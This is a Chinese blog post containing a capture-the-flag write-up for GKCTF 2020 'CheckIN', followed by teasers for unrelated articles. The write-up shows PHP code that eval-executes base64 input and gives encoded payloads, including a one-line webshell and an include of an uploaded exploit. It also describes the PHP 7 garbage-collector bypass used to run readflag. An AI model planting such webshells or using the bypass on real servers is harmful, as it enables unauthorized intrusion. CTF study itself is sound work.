news 2026/7/7 19:42:02

[GKCTF 2020]CheckIN

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
[GKCTF 2020]CheckIN

classClassName{public$code=null;public$decode=null;function__construct(){// 1. 从 $_REQUEST(GET/POST/Cookie)中获取「Ginkgo」参数的值$this->code=@$this->x()['Ginkgo'];// 2. 对 Ginkgo 的值做 base64 解码$this->decode=@base64_decode($this->code);// 3. 执行解码后的代码@Eval($this->decode);}publicfunctionx(){return$_REQUEST;}}newClassName();// 实例化类,自动触发 __construct 方法

就是执行用base64加密的$_REQUEST传入的参数Ginkgo
phpinfo();加密后为cGhwaW5mbygpOw==

/?Ginkgo=cGhwaW5mbygpOw==


没禁用eval等函数

传一句话木马连接上shell。
eval($_POST[pwd]);加密后为ZXZhbCgkX1BPU1RbcHdkXSk7

打开却显示flag为空。
发现readflag文件,应该是运行这个文件来读flag。

php7-gc-bypass漏洞利用PHP garbage collector程序中的堆溢出触发进而执行命令
影响范围是linux,php7.0-7.3

php7-gc-bypass漏洞源于 PHP 垃圾回收(GC)机制中的堆溢出,PHP 的 GC 在处理循环引用的变量时,会对内存块进行标记和回收。漏洞存在于内存块的大小计算逻辑中,恶意构造的循环引用变量会触发堆溢出,覆盖相邻内存数据。因此利用堆溢出可篡改函数指针,最终执行任意系统命令。

网上有EXP ( Exploit ),修改一下执行对象为readflag。
修改后上传文件至tmp目录下。

include('/tmp/exploit.php');加密后为aW5jbHVkZSgnL3RtcC9leHBsb2l0LnBocCcpOw==

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/7/7 16:48:58

商品颜色/尺码选项太多|谷歌爬虫不收录怎么办

当商品页出现5种颜色x8个尺码40个SKU页面时,网站收录率可能暴跌50%以上。谷歌爬虫面对海量相似页面时,会自动判定为"低质量重复内容",轻则降低索引量,重则导致核心商品页连带降权。URL结构怎么设置最安全?商…

作者头像 李华
网站建设 2026/7/7 9:58:26

SpringBean生命周期,动态代理

SpringBean生命周期,动态代理 SpringBean生命周期流程代码 动态代理CglibDynamicProxyJDKDynamicProxy SpringBean生命周期 流程 代码 package cn.yx.zg.lifecyclebean;import org.springframework.beans.BeansException; import org.springframework.beans.facto…

作者头像 李华
网站建设 2026/7/7 13:44:21

Java现在太卷了,继续找还是转行啊

这是小红书上一位31岁Java后端被裁员待业中的真实经历。 Java程序员真的没有出路了吗? 我需要坦诚地告诉用户,传统Java开发岗位确实面临挑战,但不是完全没有出路。 关键是思维的转变和技能升级。 不是没有出路,而是出路正在发生…

作者头像 李华
网站建设 2026/7/7 12:26:44

14、KDE 环境下的邮件、新闻组、传真及网页浏览使用指南

KDE 环境下的邮件、新闻组、传真及网页浏览使用指南 一、邮件搜索与使用 (一)KMail 搜索功能 在 KMail 中,你可以通过主题、发件人、收件人、抄送、组织标题或完整消息进行搜索。操作步骤如下: 1. 点击文件夹选择下“位置”旁边的弹出菜单。 2. 在“包含”弹出菜单旁边…

作者头像 李华